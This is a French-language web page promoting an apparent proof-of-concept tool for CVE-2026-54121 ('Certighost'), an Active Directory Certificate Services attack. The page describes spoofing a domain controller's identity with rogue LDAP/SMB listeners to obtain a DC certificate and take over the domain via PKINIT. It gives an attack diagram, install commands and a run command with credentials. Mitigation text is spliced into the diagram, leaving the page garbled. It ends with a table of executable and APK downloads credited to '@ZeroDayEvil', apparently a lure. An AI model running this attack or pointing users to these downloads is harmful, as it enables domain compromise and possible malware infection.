
Module de preuve de concept pour CVE-2026-54121 (Certighost), exploitant la validation d'inscription AD CS via des écouteurs LDAP/SMB malveillants pour usurper l'identité d'un contrôleur de domaine et élever les privilèges via PKINIT.
🛡 Module d'outil de sécurité IA
CVE-2026-54121 : Usurpation d'identité Active Directory Certificate Services (Certighost)
Module officiel d'audit de sécurité pour l'écosystème AI Security Tool
🌐 Démo Web • 📚 Site du projet • 💬 Chat communautaire
Navigation du site : Accueil • Mises à jour • Téléchargements • Modules
Ce module fournit des capacités de diagnostic pour CVE-2026-54121, surnommée Certighost. La vulnérabilité existe au sein d'Active Directory Certificate Services (AD CS) durant la phase de validation des inscriptions de certificats de comptes d'ordinateur.
Un attaquant disposant d'identifiants de domaine standard à faibles privilèges crée un nouveau compte d'ordinateur et soumet une demande de certificat contenant des attributs manipulés cdc (écouteur IP contrôlé) et rmd (FQDN du DC cible). Lorsque l'Autorité de certification (CA) se reconnecte pour valider l'identité de la machine, des écouteurs LDAP (port 389) et SMB/LSA (port 445) malveillants usurpent les attributs d'identité du contrôleur de domaine cible (sAMAccountName, SID, dNSHostName). Cela trompe la CA qui délivre un certificat authentique de contrôleur de domaine, permettant une compromission totale du domaine via PKINIT.
« S'authentifier en tant que machine, escalader vers tout le domaine. »
Certighost contourne les permissions traditionnelles des modèles AD CS en empoisonnant le pipeline de résolution d'identité de la CA. L'obtention d'un certificat valide de contrôleur de domaine accorde une authentification PKINIT instantanée, produisant à la fois un cache d'identifiants TGT (.ccache) et le hash NT du DC cible.
graph TD
A[Low-Priv Domain User] -->|1. Create Computer Account| B[Domain Controller]
A -->|2. Start Rogue SMB 445 / LDAP 389 Listeners| C[Attacker Machine]
A -->|3. Submit Cert Request with cdc & rmd Attributes| D[Active Directory CA]
D -->|4. CA Lookups Connect to Rogue Listeners| C
C -->|5. Validate via Netlogon & Return Target DC Identity| D
D -->|6. Issue Valid DC Certificate .pfx| A
A -->|7. Perform PKINIT with DC Certificate| E[Full Domain Takeover / NT Hash Export]ms-DS-MachineAccountQuota à 0 pour empêcher les utilisateurs non administrateurs de créer de nouveaux objets ordinateur.EDITF_ATTRIBUTESUBJECTALTNAME2 (ESC6) est désactivé sauf si explicitement requis.⚠️ IMPORTANT : Ce module est conçu pour des tests de diagnostic sécurisés au sein du framework AI Security Tool. Exécutez uniquement contre des cibles autorisées avec des privilèges administratifs élevés.
Pour exécuter les scripts de diagnostic et de surveillance, installez le framework principal AI Security Tool :
Installez les bibliothèques Python requises pour les écouteurs LDAP/SMB malveillants et la gestion des certificats :
# Install python dependencies
sudo pip install --break-system-packages git+https://github.com/fortra/impacket.git cryptography pyasn1 asn1crypto pycryptodome dnspython
# Execute Certighost proof-of-concept (Requires root for ports 389/445)
sudo python3 certighost.py -d playground.local -u lowpriv -p 'Password1234' --dc-ip 192.168.1.10Modules de scanner de vulnérabilités, scripts PoC et dépôts de recherche maintenus par notre communauté :
4 modules@ZeroDayEvil
@ZeroDayEvil
@ZeroDayEvil
@ZeroDayVPN
3 modules@ZeroDayEvil
@ZeroDayVPN
@ZeroDayEvil
2 modules@ZeroDayEvil
@ZeroDayVPN
Cet outil et cette analyse de sécurité sont fournis strictement pour l'audit de systèmes autorisé, la recherche défensive et les missions de tests d'intrusion.
L'exécution de CVE-2026-54121 contre des environnements de domaine sans autorisation écrite expresse du propriétaire du système est illégale. Les auteurs n'assument aucune responsabilité pour toute compromission de domaine non autorisée, perte de données ou perturbation de système.
Nous accueillons les contributions de la communauté de recherche en sécurité ! Principaux domaines de contribution :
AI Security Tool — Réinventer le flux de travail terminal et l'automatisation pour les professionnels de la cybersécurité.
| Spécification | Valeur attribuée | Notes |
|---|
| Identifiant CVE | CVE-2026-54121 | Usurpation d'identité Active Directory Certificate Services |
| Niveau de gravité | Critique (CVSS v3.1 : 9.8) | CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H |
| Type de vulnérabilité | CWE-287 / CWE-290 | Authentification incorrecte / Contournement d'authentification par usurpation |
| Composant affecté | Active Directory Certificate Services (AD CS) | Pipeline d'inscription de certificats et de validation d'identité |
| Vecteur d'attaque | Réseau | Exécuté à distance via les protocoles SMB, LDAP et RPC |
| Privilèges requis | Faibles privilèges | Compte utilisateur de domaine standard (capacité à ajouter des comptes machine) |
| OS / Plateforme | Version | Architecture / Format | Date de publication | Statut | Lien de téléchargement |
|---|
| 🪟 Windows | v6.3.20 | Installateur x64 (.exe) | 2026-09-08 | 🟢 Dernière version | Télécharger .exe |
| 🪟 Windows | v6.3.20 | Portable x64 (.tar.gz) | 2026-09-08 | 🟢 Dernière version | Télécharger .tar.gz |
| 🍏 macOS | v5.3.29 | Apple Silicon M1/M2/M3 (.dmg) | 2026-09-05 | 🟢 Stable | Télécharger .dmg |
| 🐧 Linux | v5.3.27 | Universel x64 (.tar.gz) | 2026-09-01 | 🟢 Stable | Télécharger .tar.gz |
| 🤖 Android | v8a 5.3.27 | APK ARM64 (.apk) | 2026-09-01 | 🟢 Stable | Télécharger .apk |